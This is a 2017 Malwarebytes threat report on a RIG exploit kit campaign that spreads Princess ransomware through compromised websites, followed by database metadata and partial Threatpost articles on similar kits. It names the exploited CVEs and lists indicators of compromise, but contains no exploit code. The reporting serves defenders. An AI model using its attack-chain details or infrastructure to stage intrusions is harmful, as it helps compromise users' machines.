RIG exploit kit distributes Princess ransomware

2017-08-31T20:04:32

Description

We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads. We had [analyzed ](<https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/>)the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber's onion page, the actual code was much different. A [new payment page](<https://twitter.com/campuscodi/status/900434464341463043>) seemed to have been seen in underground forums and is now being used with attacks in the wild. ### From hacked site to RIG EK We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising. Yet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known "Seamless gate" which has been dropping copious amounts of the Ramnit Trojan. ![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/flow-1.png) The ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>), [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>), [CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>), [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) or Flash Player ([CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>)) vulnerabilities. ### Princess ransomware Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called **__USE_TO_REPAIR_[a-zA-Z0-9].html_** where [a-zA-Z0-9] is a random identifier. [![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png)](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png> "" ) The payment page can be accessed via several provided links including a '_.onion_' one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing. [![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png)](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png> "" ) ### Down but still kicking The exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers. We will update this post with additional information about Princess Locker if there is anything noteworthy to add. ### Indicators of compromise RIG EK gate: 185.198.164.152 RIG EK IP address: 188.225.84.28 PrincessLocker binary: c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7 PrincessLocker payment page: royall6qpvndxlsj[.]onion The post [RIG exploit kit distributes Princess ransomware](<https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).

{"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/", "references": [], "enchantments_done": [], "id": "MALWAREBYTES:97E85AF6235DC2739548158FE583610A", "modified": "2017-08-31T20:04:32", "lastseen": "2017-08-31T23:10:36", "published": "2017-08-31T20:04:32", "description": "We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.\n\nWe had [analyzed ](<https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/>)the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber's onion page, the actual code was much different. A [new payment page](<https://twitter.com/campuscodi/status/900434464341463043>) seemed to have been seen in underground forums and is now being used with attacks in the wild.\n\n### From hacked site to RIG EK\n\nWe are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.\n\nYet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known \"Seamless gate\" which has been dropping copious amounts of the Ramnit Trojan.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/flow-1.png)\n\nThe ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>), [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>), [CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>), [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) or Flash Player ([CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>)) vulnerabilities.\n\n### Princess ransomware\n\nOnce the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called **__USE_TO_REPAIR_[a-zA-Z0-9].html_** where [a-zA-Z0-9] is a random identifier.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png)](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png> \"\" )\n\nThe payment page can be accessed via several provided links including a '_.onion_' one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png)](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png> \"\" )\n\n### Down but still kicking\n\nThe exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.\n\nWe will update this post with additional information about Princess Locker if there is anything noteworthy to add.\n\n### Indicators of compromise\n\nRIG EK gate:\n \n \n 185.198.164.152\n\nRIG EK IP address:\n \n \n 188.225.84.28\n\nPrincessLocker binary:\n \n \n c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7\n\nPrincessLocker payment page:\n \n \n royall6qpvndxlsj[.]onion\n\nThe post [RIG exploit kit distributes Princess ransomware](<https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "title": "RIG exploit kit distributes Princess ransomware", "cvelist": ["CVE-2013-2551", "CVE-2014-6332", "CVE-2015-2419", "CVE-2015-8651", "CVE-2016-0189"], "viewCount": 817, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201512-17"]}, {"type": "canvas", "idList": ["MS14_064_IE_OLEAUT32"]}, {"type": "cert", "idList": ["VU:158647"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-1695", "CPAI-2014-0371", "CPAI-2014-0372", "CPAI-2014-0948", "CPAI-2014-1940", "CPAI-2015-0843", "CPAI-2015-1058", "CPAI-2015-1429", "CPAI-2016-0309", "CPAI-2019-0214"]}, {"type": "cve", "idList": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551", "CVE-2014-6332", "CVE-2015-2419", "CVE-2015-8651", "CVE-2016-0187", "CVE-2016-0189"]}, {"type": "exploitdb", "idList": ["EDB-ID:35229", "EDB-ID:35230", "EDB-ID:37163", "EDB-ID:40118"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4B89C29DF8084BFEB40B0A80CA12CA4D", "EXPLOITPACK:BD50C444DA0D90A11299EF462DF0392B", "EXPLOITPACK:BE1DCB01F1C7378A03AFD86DF0DC922D", "EXPLOITPACK:EDA849C98B534499CB4C877AF2D534C4"]}, {"type": "fireeye", "idList": ["FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "FIREEYE:0CAA37548C7EBA899FA1174794304489", "FIREEYE:1199DD4FBE70F58C3062B0B2270EAA03", "FIREEYE:1A61A821CE69D378830204326B2E938C", "FIREEYE:2B54485AD5D7B8DCC55F5A6BE1F3DBD6", "FIREEYE:50656CA8D413ED51CDE771F0BAB863B5", "FIREEYE:5D24D2858B8BB9D354FB42C4E22B5DD7", "FIREEYE:622FA05F62A3EDD3379557F635579EFB", "FIREEYE:6381573A131149D7EF323EABC685A028", "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "FIREEYE:8219EF8C20E41CCEB361F61E7498E804", "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "FIREEYE:BA5D99C38621C3A47D6895E339B11FE4", "FIREEYE:BE50F5D8A44B5F476D7A63CB23072BEA", "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069"]}, {"type": "freebsd", "idList": ["84C7EA88-BF04-4BDC-973B-36744BF540AB"]}, {"type": "gentoo", "idList": ["GLSA-201601-03"]}, {"type": "kaspersky", "idList": ["KLA10601", "KLA10634", "KLA10727", "KLA10801", "KLA10805", "KLA10806", "KLA11914"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "MALWAREBYTES:29082210E17AE80B08D8FF58AED79F23", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_037_SVG_DASHSTYLE", "MSF:EXPLOIT/WINDOWS/BROWSER/MS14_064_OLE_CODE_EXECUTION", "MSF:EXPLOIT/WINDOWS/BROWSER/MS14_064_OLE_CODE_EXECUTION/", "MSF:EXPLOIT/WINDOWS/BROWSER/MS16_051_VBSCRIPT", "MSF:EXPLOIT/WINDOWS/BROWSER/MS16_051_VBSCRIPT/", "MSF:ILITIES/WINDOWS-HOTFIX-MS14-064/"]}, {"type": "mmpc", "idList": ["MMPC:0CBDFDEA590166A1E24CF4941C0CD670", "MMPC:A8911A071FAE866BC15F59CA0B325D45"]}, {"type": "mscve", "idList": ["MS:CVE-2016-0187", "MS:CVE-2016-0189"]}, {"type": "mskb", "idList": ["KB2829530", "KB3011443", "KB3076321", "KB3155533", "KB3156764", "KB3158991"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681902", "MYHACK58:62201785342", "MYHACK58:62201994507"]}, {"type": "nessus", "idList": ["9041.PRM", "9044.PRM", "9045.PASL", "ADOBE_AIR_APSB16-01.NASL", "FLASH_PLAYER_APSB16-01.NASL", "FREEBSD_PKG_84C7EA88BF044BDC973B36744BF540AB.NASL", "GENTOO_GLSA-201601-03.NASL", "MACOSX_ADOBE_AIR_APSB16-01.NASL", "MACOSX_FLASH_PLAYER_APSB16-01.NASL", "OPENSUSE-2015-975.NASL", "REDHAT-RHSA-2015-2697.NASL", "SMB_KB3132372.NASL", "SMB_NT_MS13-037.NASL", "SMB_NT_MS14-064.NASL", "SMB_NT_MS15-065.NASL", "SMB_NT_MS16-051.NASL", "SMB_NT_MS16-053.NASL", "SUSE_SU-2015-2401-1.NASL", "SUSE_SU-2015-2402-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121438", "OPENVAS:1361412562310131165", "OPENVAS:1361412562310805015", "OPENVAS:1361412562310805720", "OPENVAS:1361412562310807015", "OPENVAS:1361412562310807016", "OPENVAS:1361412562310807017", "OPENVAS:1361412562310807018", "OPENVAS:1361412562310807019", "OPENVAS:1361412562310807322", "OPENVAS:1361412562310807819", "OPENVAS:1361412562310811495", "OPENVAS:1361412562310811496", "OPENVAS:1361412562310811497", "OPENVAS:1361412562310811498", "OPENVAS:1361412562310851152", "OPENVAS:1361412562310903307", "OPENVAS:903307"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121997", "PACKETSTORM:129100", "PACKETSTORM:129210", "PACKETSTORM:129326", "PACKETSTORM:132113", "PACKETSTORM:132462", "PACKETSTORM:132767", "PACKETSTORM:133107", "PACKETSTORM:133261", "PACKETSTORM:134053", "PACKETSTORM:134061", "PACKETSTORM:134062", "PACKETSTORM:134064", "PACKETSTORM:134079", "PACKETSTORM:138193"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "redhat", "idList": ["RHSA-2015:2697"]}, {"type": "saint", "idList": ["SAINT:0BF8EDFDFFD4797DCC0B0A0607B187D5", "SAINT:2AEFC3D71E2274B2158FD88B4887ADBF", "SAINT:4973412AEB13D8BC398B274492266AEC", "SAINT:87287166C5511F458A2B797E5A889BC8", "SAINT:A3620300B54852672908F617C4607F00", "SAINT:B956617792AC597CB312763B7C86DB9C", "SAINT:C7EDBAF745A12B48814DE43223AAA600", "SAINT:FBD9EA13A5798F1EA68071D436F4A3DE"]}, {"type": "securelist", "idList": ["SECURELIST:1CDC71C188E5925A3F6040BF90E18BD2", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29424", "SECURITYVULNS:DOC:32398", "SECURITYVULNS:VULN:13082", "SECURITYVULNS:VULN:14090", "SECURITYVULNS:VULN:14594"]}, {"type": "seebug", "idList": ["SSV:60700", "SSV:89272", "SSV:92247", "SSV:92734"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:2400-1", "OPENSUSE-SU-2015:2403-1", "SUSE-SU-2015:2401-1", "SUSE-SU-2015:2402-1"]}, {"type": "symantec", "idList": ["SMNTC-58570", "SMNTC-70952", "SMNTC-75661", "SMNTC-79705", "SMNTC-90012"]}, {"type": "thn", "idList": ["THN:29028978D638C8DC2B9B7072A290DE97", "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "THN:BF8375E3582DA11921BF468B0D3C4F03"]}, {"type": "threatpost", "idList": ["THREATPOST:0A77C4DD63E33A11E6E2957F79023DE8", "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "THREATPOST:25D046C31909BDD0D33A9F68E8796B5E", "THREATPOST:3F20438316043C71AAD9C85191711EEE", "THREATPOST:48D183653EE317814B4447BF6FA92654", "THREATPOST:531D9E2E2960D83A1A334DF82AE3EA2E", "THREATPOST:5322570E76BC4C08BD99F13E1B7F793F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:732D47548D1F723578CC0BCC66F37872", "THREATPOST:7FB17A328D8323E9E6A2DEBE58409A4D", "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "THREATPOST:98820CBC19A99D41A0F54773D962C7D7", "THREATPOST:9928E4032CF09647D7486B6AB9996982", "THREATPOST:A3BB2FFA95F5B0C5ED7362707F7E5AFE", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:C7FFC7E4C14F88FBB68B38188CC067E2", "THREATPOST:CF1CC9C0D8290B4C256DFC08EEB34FE1", "THREATPOST:E894CC01A01E2286CFFF1609A00DE5BB", "THREATPOST:F2E9B170455BA915DEFBB02F2E1BFFDD"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-8651"]}, {"type": "vulnerlab", "idList": ["VULNERABLE:1576", "VULNERLAB:1576"]}, {"type": "zdi", "idList": ["ZDI-13-102"]}, {"type": "zdt", "idList": ["1337DAY-ID-22862", "1337DAY-ID-22863", "1337DAY-ID-22950", "1337DAY-ID-23808", "1337DAY-ID-23905", "1337DAY-ID-24058", "1337DAY-ID-24430", "1337DAY-ID-24433", "1337DAY-ID-30433"]}]}, "score": {"value": 8.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201512-17"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-1695", "CPAI-2014-0372", "CPAI-2014-1940", "CPAI-2015-1058"]}, {"type": "cisa", "idList": ["CISA:17ECE93409F2BF9846D576277DA8717C", "CISA:452D43AC6599B76DF22B4805470283C8", "CISA:8FAFD5A4573898E60D59E0AE79D28E99"]}, {"type": "cve", "idList": ["CVE-2013-2551", "CVE-2015-8651", "CVE-2016-0189"]}, {"type": "exploitdb", "idList": ["EDB-ID:40118"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4B89C29DF8084BFEB40B0A80CA12CA4D"]}, {"type": "fireeye", "idList": ["FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E"]}, {"type": "freebsd", "idList": ["84C7EA88-BF04-4BDC-973B-36744BF540AB"]}, {"type": "kaspersky", "idList": ["KLA10727"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS13_037_SVG_DASHSTYLE"]}, {"type": "mmpc", "idList": ["MMPC:0CBDFDEA590166A1E24CF4941C0CD670"]}, {"type": "mscve", "idList": ["MS:CVE-2016-0187"]}, {"type": "mskb", "idList": ["KB3011443"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681902"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201601-03.NASL", "SMB_NT_MS16-053.NASL", "SUSE_SU-2015-2401-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310131165"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134053"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "saint", "idList": ["SAINT:B956617792AC597CB312763B7C86DB9C", "SAINT:C7EDBAF745A12B48814DE43223AAA600"]}, {"type": "securelist", "idList": ["SECURELIST:1CDC71C188E5925A3F6040BF90E18BD2"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14090", "SECURITYVULNS:VULN:14594"]}, {"type": "seebug", "idList": ["SSV:92247"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:2400-1"]}, {"type": "symantec", "idList": ["SMNTC-79705"]}, {"type": "threatpost", "idList": ["THREATPOST:5322570E76BC4C08BD99F13E1B7F793F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF"]}, {"type": "vulnerlab", "idList": ["VULNERABLE:1576"]}, {"type": "zdt", "idList": ["1337DAY-ID-22862", "1337DAY-ID-24430"]}]}, "exploitation": null, "vulnersScore": 8.3}, "reporter": "J\u00e9r\u00f4me Segura", "bulletinFamily": "blog", "type": "malwarebytes", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}

{"threatpost": [{"lastseen": "2018-10-06T22:53:15", "description": "Despite [a marked decrease in activity](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), exploit kits haven\u2019t completely disappeared just yet. The Neptune, or Terror Exploit Kit, is alive and well; during the last month, researchers have observed the kit as part of a campaign to abuse a legitimate popup ad service to drop cryptocurrency miners.\n\nResearchers with FireEye [said Tuesday](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the kit has been redirecting victims with popups from fake hiking ads to exploit kit landing pages and in turn to HTML and Adobe Flash exploits. Researchers elected not to disclose the name of the popup ad service, but stressed that it\u2019s within Alexa\u2019s top 100.\n\nThe landing pages run a handful of exploits, including three targeting Internet Explorer (CVE-2016-0189, CVE-2015-2419, CVE-2014-6332) and two targeting Flash (CVE-2015-8651, CVE-2015-7645).\n\nAccording to FireEye researchers Zain Gardezi and Manish Sardiwal, the malvertising redirects are mimicking the domains of actual hiking sites, and in some instances sites that allow users to convert YouTube videos to MP3s. Once redirected, the ads, most which appear on high-traffic torrent and multimedia hosting sites, drop a Monero miner.\n\nMonero, an open source cryptocurrency that bills itself as \u201csecure, private, and untraceable\u201d has caught on with cybercriminals over the last several months.\n\nOne cryptocurrency miner [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) was spotted in April using the same NSA Eternal Blue exploit and DoublePulsar rootkit that spread WannaCry, to infect computers and mine Monero.\n\nAccording to FireEye, for the new Neptune EK campaign a uniform resource identifier (URI) belonging to the exploit kit domain has been dropping the payload as a plain executable. After a machine has been infected, attempts are made to log in to minergate[.]com, a cryptocurrency GUI miner and mining pool, with the attacker\u2019s email address.\n\nResearchers noticed this campaign on July 16 and were able to pin it on changes in the kit\u2019s URI patterns.\n\nSpreading resource intensive cryptocurrency miners helps attackers raise small amounts of money that can potentially be used to fund other future attacks.\n\n[Attackers in June](<https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/>) used an exploit for a Samba vulnerability patched in May to spread payloads that spread Monero miners. Researchers with Kaspersky Lab who discovered the operation said that attackers hardcoded their wallet and pool address into the attack and managed to raise $6,000 USD via the campaign.\n\nThe vulnerabilities that Neptune uses are dated; in fact Microsoft fixed one of them in November 2014, CVE-2014-6332, which could have allowed remote code execution via Windows OLE vulnerabilities. Gardezi and Sardiwal warn that users running out-of-date or unpatched software could still be at risk, especially as drive-by download kits such as Neptune have taken a shine to using malvertisements to push malicious downloads of late.\n\nSimilar to Sundown, the Neptune/Terror exploit kit is one of several that popped up following Angler\u2019s disappearance in 2016. Researchers said [in May earlier this year](<https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/>) that the kit had adopted new anti-detection features and slowly evolved into a threat.\n", "cvss3": {}, "published": "2017-08-22T17:51:58", "type": "threatpost", "title": "Neptune Exploit Kit Dropping Cryptocurrency Miners Through Malvertisements", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T21:51:58", "id": "THREATPOST:3F20438316043C71AAD9C85191711EEE", "href": "https://threatpost.com/neptune-exploit-kit-dropping-cryptocurrency-miners-through-malvertisements/127591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:18", "description": "Security experts are warning some \u201cQuit Smoking\u201d and \u201c20 Minute Fat Loss\u201d ads online are delivering more than sales pitches. According to researchers at Zscaler, ads are redirecting browsers to malicious landing pages hosting the Terror exploit kit.\n\nThe campaigns have been sustained, with the initial blast spotted on Sept. 1 and lasting through Oct. 23.\n\n\u201cTerror EK activity has been low throughout the year but we are starting to see an uptick in the activity delivered via malvertising campaigns in past two months,\u201d according to Rohit Hegde security researcher at Zscaler.\n\nThe Terror EK is distinguished for being a relatively new exploit kit, first identified earlier this year. In a [separate Zscaler report](<https://www.zscaler.com/blogs/research/top-exploit-kit-activity-roundup-winter-2017>), researchers said the EK borrows from other kits such as Sundown and Hunter with additional pieces borrowed from exploits built for the penetration testing software Metasploit.\n\n\u201cWe\u2019ve continued tracking the development of this kit since we first spotted it, and have watched developers transition to new domains with stolen identities, with traffic coming from the PopAds advertising network,\u201d said Derek Gooley, Zscaler security researcher.\n\nOver the past two months, a typical attack includes Terror EK redirects in the form of fake advertisements in the form of pop-up ads. \u201cThe initial JavaScript that gets served via a malicious advertisement page is obfuscated,\u201d Hegde said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/10/06222252/ZDF_plot_2Months.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/10/06222252/ZDF_plot_2Months.png>)\n\n\u201cWhen a request is sent to the .php page, it responds with a HTTP 302 redirect to Terror EK Landing page,\u201d researchers said. And that Terror EK landing page contains the VBScript and JavaScript exploits.\n\nAccording to researchers, the Terror exploit kit is targeting two vulnerabilities [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>) and [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>). One of the bugs (CVE-2016-0189) is a scripting engine memory corruption vulnerability in Jscript (5.8) and VBScript (5.7, 5.8) engines used in Internet Explorer 9 through 11. The second (CVE-2014-6332) is a 2014 flaw called a Windows OLE automation array remote code execution vulnerability found in multiple versions of Windows from 7 to 8.1.\n\nIn addition to those two CVEs, researchers said, the landing page also calls to another URL, which tries to load three Flash exploits.\n\n\u201cThe Terror EK actors have now started protecting their SWF files from decompilers using the DComSoft SWF Protector,\u201d Zscaler explains. SWF Protector is software to protect SWF files and to make them secure.\n\nAs for the payload, researchers say the malware served in the most recent Terror EK malvertising chains belongs to the Smoke Loader downloader Trojan family.\n\n\u201cWe observed that Smoke Loader payload with MD5 hash of \u201c6ea344d0db80ab6e5cabdc9dcecd5ad4\u2033 was served for an active Terror EK cycle earlier this week the most recent payload has MD5 hash of \u2018b23745bcd2937b9cfaf6a60ca72d3d67\u2019,\u201d wrote researchers.\n\nSmoke Loader is also known as [the Backdoor.Win32.Mokes, a](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Backdoor.Win32.Mokes](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Backdoor.Win32.Mokes](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>)[ Trojan](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Mokes>) designed to give attackers remote control over an infected computer.\n", "cvss3": {}, "published": "2017-10-25T08:28:31", "type": "threatpost", "title": "Malvertising Campaign Redirects Browsers To Terror Exploit Kit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189"], "modified": "2017-10-25T08:28:31", "id": "THREATPOST:C7FFC7E4C14F88FBB68B38188CC067E2", "href": "https://threatpost.com/malvertising-campaign-redirects-browsers-to-terror-exploit-kit/128596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:43", "description": "When an exploit kit fades away, it usually doesn\u2019t take long for another to take its place in the limelight, especially when the kit is an integral part of the ransomware ecosystem.\n\nThat\u2019s exactly what\u2019s happened over the past few weeks as researchers say they\u2019ve seen an uptick in RIG Exploit Kit traffic used to peddle CrypMIC ransomware.\n\nThe news comes two weeks [after researchers shut down a global malvertising campaign](<https://threatpost.com/malvertising-campaign-pushing-neutrino-exploit-kit-shut-down/120322/>) that was delivering the same ransomware but via the Neutrino Exploit Kit. While RIG is far from new \u2013 it was pushing Cryptowall ransomware on victims [as far back as 2014](<https://threatpost.com/rig-exploit-kit-pushing-cryptowall-ransomware/106540/>) \u2013 it has enjoyed a spike in the days following Neutrino\u2019s decline, researchers say.\n\nAccording to experts at Heimdal Security, who have tracked the kit\u2019s traffic over the past 20 days, it\u2019s [picking up where Neutrino left off](<https://heimdalsecurity.com/blog/security-alert-rig-exploit-kit-crypmic-ransomware/>). A new campaign is using script injection to compromise legitimate websites and redirect victims to hijacked domains pushing CrypMIC. Andra Zaharia, a security evangelist with the Danish firm, said some attacks are using malicious iFrame HTML code as the injects.\n\nRIG is using a technique previously utilized by the Angler Exploit Kit, [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396/>), to redirect users. Attackers use stolen domain credentials to set up subdomains to divert traffic to the arbitrary sites. Domain owners are often none the wiser because many neglect to monitor their login credentials and fail to notice after they\u2019ve been compromised in a phishing attack.\n\nAccording to Zaharia, the new campaign bears a resemblance to [Pseudo-Darkleech](<https://threatpost.com/the-changing-face-of-pseudo-darkleech/119036/>), a campaign that\u2019s been used for more than a year now to deliver exploit kits. Both campaigns use similar patterns when it comes to injecting malicious scripts and redirecting traffic to the exploit kit infrastructure, Zaharia said.\n\nResearchers with Cisco Talos, who took down the Neutrino-CrypMIC campaign 20 days ago, believe it exposed roughly one million users to malicious ads for the two weeks they followed it in early August. The researchers worked with GoDaddy to subsequently shut down domains that were being used by the campaign to redirect traffic to a server hosting Neutrino in Russia.\n\nThe RIG-CrypMIC campaign takes advantage of recent vulnerabilities in Adobe Flash Player, according to Heimdal. Following the exploit, CrypMIC is dropped into a Windows temporary folder with a random name. From there, the malware connects to a command and control server.\n\nWhile Zaharia told Threatpost they don\u2019t have the traffic numbers in full, she did confirm the payload\u2019s delivery efficiency is at 35.6 percent, spread out across different Flash exploits.\n\nThe exploits include CVE-2015-8651, a vulnerability that Adobe patched last December, and CVE-2016-4117, a zero day vulnerability [the company patched in May](<https://threatpost.com/emergency-flash-update-patches-public-zero-day/118055/>). Attackers embedded CVE-2016-4117 into Neutrino a week after it was patched by the company and the Scarcruft APT gang, a group that was spotted targeting Russia, Nepal, and South Korea, also leveraged the exploit. According to researchers at Kaspersky Lab, who identified the group in June, Scarcruft paired the exploit with watering hole attacks as part of [Operation Erebus](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), a series of attacks carried out in spring.\n\nThe campaign also uses an IE zero day, CVE-2016-0189, that Microsoft patched in May to carry out attacks. Developers behind Neutrino [incorporated that vulnerability into the exploit kit in 